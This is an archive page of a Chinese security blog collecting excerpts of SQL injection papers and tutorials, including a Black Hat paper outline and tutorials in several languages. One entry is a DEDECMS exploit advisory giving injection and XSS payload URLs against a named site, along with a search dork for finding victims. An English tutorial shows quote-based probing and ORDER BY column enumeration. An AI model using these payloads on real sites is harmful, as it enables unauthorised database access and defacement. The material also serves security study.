存档

文章标签 ‘SQL Injection’

Advanced SQL injection to operating system full control

2011年2月17日 admin     1,593 views 没有评论

From:http://www.blackhat.com/presentations/bh-europe-09/Guimaraes/Blackhat-europe-09-Damele-SQLInjection-slides.pdf

Advanced SQL injection to operating system full control
Bernardo Damele Assumpção Guimarães
bernardo.damele@gmail.com
April 10, 2009

This white paper discusses the security exposures of a server that occur due to a SQL injection flaw in a web application that communicate with a database.
Over ten years have passed since a famous hacker coined the term SQL injection and it is still considered one of the major application threats.A lot has been said on this vulnerability, but not all of the aspects and implications have been uncovered, yet.
This paper aim is to collate some of the existing knowledge, introduce new techniques and demonstrate how to get complete control over the database management system’s underlying operating system, file system and internal network through a SQL injection vulnerability in over-looked and theoretically not exploitable scenarios.

Contents
I Introduction
1 SQL injection
2 Web application scripting languages
2.1 Batched queries
3 Batched queries via SQL injection
3.1 MySQL
3.2 PostgreSQL
3.3 Microsoft SQL Server

II File system access
4 Read access
4.1 MySQL
4.2 PostgreSQL
4.3 Microsoft SQL Server
5 Write access
5.1 MySQL
5.2 PostgreSQL
5.3 Microsoft SQL Server
III Operating system access
6 User-Defined Function
7 UDF injection
7.1 MySQL
7.1.1 Shared library creation
7.1.2 SQL injection to command execution
7.2 PostgreSQL
7.2.1 Shared library creation
7.2.2 SQL injection to command execution
8 Stored procedure
8.1 Microsoft SQL Server
8.1.1 xp_cmdshell procedure
8.1.2 SQL injection to command execution

IV  Out-of-band connection
9 Stand-alone payload stager
9.1 Payload stager options
9.2 Session
10 SMB relay attack
10.1 Universal Naming Convention
10.2 Abuse UNC path requests
10.2.1 MySQL
10.2.2 PostgreSQL
10.2.3 Microsoft SQL Server

11 Stored procedure buffer overflow
11.1 Exploit
11.2 Memory protection
11.3 Bypass DEP

V Privilege escalation
VI Conclusion
12 Acknowledgments
阅读全文…

分类: 渗透测试 标签: , , , , ,

[zz]DEDECMS V5.6GBK 版本注入漏洞

2010年4月12日 admin     1,997 views 没有评论

DEDECMS终于要发布5.6了,期待ing…没办法下到程序,就去做了个黒盒测试,
暂时也没办法分析更多…
嗯,.
会员中心首页(../member/index.php)函数过滤不严格造成盲注,数据库错误模式,XSS
测试站点:http://zz.5u.cn

=============================================
| # Title    : DEDECMS V5.6 GBK SQL injection Vulnerability
| # Author   : Akira
| # email    : MCAkira@HotMail.CoM
| # Home     : [url]http://www.hackclub.net[/url]
| # Web Site : [url]http://zz.u5.cn[/url]
| #Download: [url]http://www.dedecms.com[/url]
| # Dork     : Powered By DEDECMS.COM © 2004-2010 DEDECMS Inc.
| # Tested on: Microsoft Windows XP SP2  + Lunix (debian 5.0)
| # Bug      :SQL injection ,XSS
==================== Exploit By Akira================

http://zz.5u.cn/member/index.php?uid=’%20||%20”%20||%20′%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

http://zz.5u.cn/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe’”)/>

http://zz.5u.cn/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7′”><iframe%20src=http://www.milsec.net>

分类: 漏洞代码 标签: , , ,

Authentication Bypass – Login form SQL Injection and magic_quotes Bypass

2010年4月3日 admin     5,415 views 没有评论

From&&pdf download:http://www.exploit-db.com/download_pdf/11956

Authentication Bypass – SQL Injection and magic_quotes

Auth Bypass by J0hn.X3r and novaca!ne
# Date: 30.03.2010
# Author: novaca!ne
# Website: j0hnx3r.org novacaine.biz
# Contact: J0hn.X3r@free-hack.com novacaine@no-trace.cc
1. Introduction
2. What is Auth Bypass
3. How to exploit it
4. Bypass magic_quotes
5. How to fix it
6. Shouts
Introduction
Dear Reader, this Paper is about „Auth Bypass“.
It was written by J0hn.X3r and edited by novaca!ne
(see original version here: http://j0hnx3r.org/?p=55 ).
You can use this simple technique to pentest your own website or when you forgot your own
password.
It was written to share knowledge, knowledge should be free and available for everyone.
What is Auth Bypass
„Auth Bypass“, short form for „Authorization Bypass.“
A Auth Bypass flaw comes up everytime a website doesn’t filter the attackers input.
It deals with Sql command injection.

阅读全文…

分类: 渗透测试 标签: , , ,

SQL Injection Tutorial

2010年3月31日 xion     2,080 views 没有评论

# Exploit Title: [paper] Tutorial SQL injection secara ringkas
# Date: January 19th, 2010
# Author: r3v3r7
# Greetz: n3wb0rn, hmsec, tbdsec…
# Language: Bahasa Melayu
   
————————————————————————————–
     Pengenalan:
————————————————————————————–

Defacement? Best ker? bagaimana caranya? Sebelum tu apa itu SQL dan SQL injection? ok, SQL ialah Structured Query Language.. cara sebutannya ialah es-q-el dan bukannya sequel(ramai yang menyebut seperti ini)… SQL sebenarnya ialah Relational Database Management sayastem, database schema creation and modification, and database object access control management.

    Ok, SQL injection pula ialah satu tekinik untuk mendapatkn error pada sesuatu laman web… contohnya, 1=1 ialah TRUE dan 1=0 ialah FALSE, maka, statement TRUE akan digunakan memaparkan isi kandungan web tersebut.. Dan jika statement itu FALSE, maka web tidak akan memaparkan isi kandungan yang sepatutnya…

    Bagaimana untuk menjadikan sesebuah web itu untuk memaparkan statement FALSE? Sebenarnya, ia bergantung samada web itu telah diPATCH/diFILTER daripada vuln, bug, error atau exploit…

    Bagaimana pula untuk mengetahui samada sesebuah web itu mempunyai vuln/bug? Banyak cara dapat digunakan seperti menggunakan vuln scanner, google dork(ikut nasib), bot, dan lain2 lagi…

阅读全文…

分类: 渗透测试 标签: , , ,

SQL Injection

2010年3月31日 xion     1,705 views 没有评论

来源:exploit-db.com

 Por Twi John
—————-

Primeiramente quero mostrar para vocês um site onde vocês poderam encontrar mais sobre novas vulnerabilidades, como se proteger de vulnerabilidades da web.

http://www.owasp.org/

Nessa aula estremos aprendendo SQLi, no entanto dessa vez estaremos consultado o database Mysql para obter informações de login e senha.

Aqui esta o site: www.site.com.br/noticias.php?id=10

Para descobrir se pode estar vulneravel, coloque ‘ depois do link, caso dei algum erro tem grande chance de estar vulneravel.

    www.site.com.br/noticias.php?id=10′

  阅读全文…

分类: 渗透测试 标签: ,

MySQL: Secure Web Apps – SQL Injection techniques

2010年3月29日 admin     9,368 views 没有评论

/================================================================================\
———————————[ PLAYHACK.net ]———————————
\================================================================================/

-[ INFOS ]———————————————————————–
Title: “MySQL: Secure Web Apps – SQL Injection techniques”
Author: Omni
Website: http://omni.playhack.net
Date: 2009-02-26 (ISO 8601)
———————————————————————————

-[ SUMMARY ]———————————————————————
0×01: Introduction
0×02: Injecting SQL
0×03: Exploiting a Login Form
0×04: Exploiting Different SQL Statement Type
0×05: Basic Victim Fingerprinting
0×06: Standard Blind SQL Injection
0×07: Double Query
0×08: Filters Evasion
0×09: SQL Injection Prevention
0×10: Conclusion
———————————————————————————

阅读全文…

分类: 渗透测试 标签: ,

MySQL注射经典教程

2010年3月29日 admin     1,897 views 没有评论
SQL Injection Tutorial by Marezzi (MySQL)
From milw0rm.com
In this tutorial i will describe how sql injection works and how to
use it to get some useful information.
First of all: What is SQL injection?
It’s one of the most common vulnerability in web applications today.
It allows attacker to execute database query in url and gain access
to some confidential information etc…(in shortly).
1.SQL Injection (classic or error based or whatever you call it) :D
2.Blind SQL Injection (the harder part)
So let’s start with some action :D
1). Check for vulnerability
Let’s say that we have some site like this
http://www.site.com/news.php?id=5
Now to test if is vulrnable we add to the end of url ‘ (quote),
and that would be http://www.site.com/news.php?id=5′
so if we get some error like
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”
or something similar
that means is vulrnable to sql injection :)
2). Find the number of columns
To find number of columns we use statement ORDER BY (tells database how to order the result)
so how to use it? Well just incrementing the number until we get an error.
http://www.site.com/news.php?id=5 order by 1/* <– no error
http://www.site.com/news.php?id=5 order by 2/* <– no error
http://www.site.com/news.php?id=5 order by 3/* <– no error
http://www.site.com/news.php?id=5 order by 4/* <– error (we get message like this Unknown column ’4′ in ‘order clause’ or something like that)
that means that the it has 3 columns, cause we got an error on 4.
分类: 渗透测试 标签: ,